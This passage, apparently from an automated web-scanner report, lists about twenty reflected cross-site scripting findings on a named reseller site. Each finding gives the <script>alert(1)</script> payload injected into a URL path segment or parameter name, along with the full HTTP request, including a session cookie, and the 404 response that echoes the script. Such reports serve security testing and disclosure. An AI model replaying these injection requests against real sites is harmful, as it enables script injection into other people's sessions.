<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/?c47ce<script>alert(1)</script>df9e5a081a3=1 was not found on this server.</p>
...[SNIP]...

2.2755. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f2d8<script>alert(1)</script>b6cb841fa26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2f2d8<script>alert(1)</script>b6cb841fa26/4/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2f2d8<script>alert(1)</script>b6cb841fa26/4/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2756. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48c5c<script>alert(1)</script>24dfe5f0438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/448c5c<script>alert(1)</script>24dfe5f0438/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/448c5c<script>alert(1)</script>24dfe5f0438/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2757. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9a67<script>alert(1)</script>9273bfd1919 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesc9a67<script>alert(1)</script>9273bfd1919/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesc9a67<script>alert(1)</script>9273bfd1919/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2758. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1ffbf<script>alert(1)</script>6814abc96d3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos1ffbf<script>alert(1)</script>6814abc96d3/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos1ffbf<script>alert(1)</script>6814abc96d3/images/ was not found on this server.</p>
...[SNIP]...

2.2759. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4881b<script>alert(1)</script>1ac25f77f3b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images4881b<script>alert(1)</script>1ac25f77f3b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images4881b<script>alert(1)</script>1ac25f77f3b/ was not found on this server.</p>
...[SNIP]...

2.2760. http://www.resellerbase.com/detail/4/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78672<script>alert(1)</script>4e884c1ba0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/?78672<script>alert(1)</script>4e884c1ba0b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/?78672<script>alert(1)</script>4e884c1ba0b=1 was not found on this server.</p>
...[SNIP]...

2.2761. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60b99<script>alert(1)</script>634a3f653c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail60b99<script>alert(1)</script>634a3f653c7/4/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail60b99<script>alert(1)</script>634a3f653c7/4/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2762. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4e14<script>alert(1)</script>b62c4750e35 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4f4e14<script>alert(1)</script>b62c4750e35/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4f4e14<script>alert(1)</script>b62c4750e35/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2763. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55a32<script>alert(1)</script>98368c1922e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes55a32<script>alert(1)</script>98368c1922e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes55a32<script>alert(1)</script>98368c1922e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2764. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce22c<script>alert(1)</script>ea031bafa59 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmosce22c<script>alert(1)</script>ea031bafa59/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmosce22c<script>alert(1)</script>ea031bafa59/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2765. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 74522<script>alert(1)</script>387c5f61cc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images74522<script>alert(1)</script>387c5f61cc2/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images74522<script>alert(1)</script>387c5f61cc2/rating/ was not found on this server.</p>
...[SNIP]...

2.2766. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2295<script>alert(1)</script>34c0e46be82 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/ratingf2295<script>alert(1)</script>34c0e46be82/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/ratingf2295<script>alert(1)</script>34c0e46be82/ was not found on this server.</p>
...[SNIP]...

2.2767. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 438fa<script>alert(1)</script>732b60a7f51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating/?438fa<script>alert(1)</script>732b60a7f51=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating/?438fa<script>alert(1)</script>732b60a7f51=1 was not found on this server.</p>
...[SNIP]...

2.2768. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8c86<script>alert(1)</script>fd6546ccb4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc8c86<script>alert(1)</script>fd6546ccb4a/4/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc8c86<script>alert(1)</script>fd6546ccb4a/4/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2769. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c9a1<script>alert(1)</script>c03738065aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/49c9a1<script>alert(1)</script>c03738065aa/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/49c9a1<script>alert(1)</script>c03738065aa/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2770. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 82eea<script>alert(1)</script>e5d7b7f34c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes82eea<script>alert(1)</script>e5d7b7f34c6/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes82eea<script>alert(1)</script>e5d7b7f34c6/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2771. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 707da<script>alert(1)</script>42591a94ed9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos707da<script>alert(1)</script>42591a94ed9/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos707da<script>alert(1)</script>42591a94ed9/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2772. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61006<script>alert(1)</script>152da2cf15e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images61006<script>alert(1)</script>152da2cf15e/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images61006<script>alert(1)</script>152da2cf15e/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.2773. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2e16b<script>alert(1)</script>ded97fd667d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/kosmos/images/rating2e16b<script>alert(1)</script>ded97fd667d/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/kosmos/images/rating2e16b<script>alert(1)</script>ded97fd667d/4half.gif was not found on this server.</p>
...[SNIP]...

2.2774. http://www.resellerbase.com/detail/4/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 30ae7<script>alert(1)</script>d3b841b60e7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

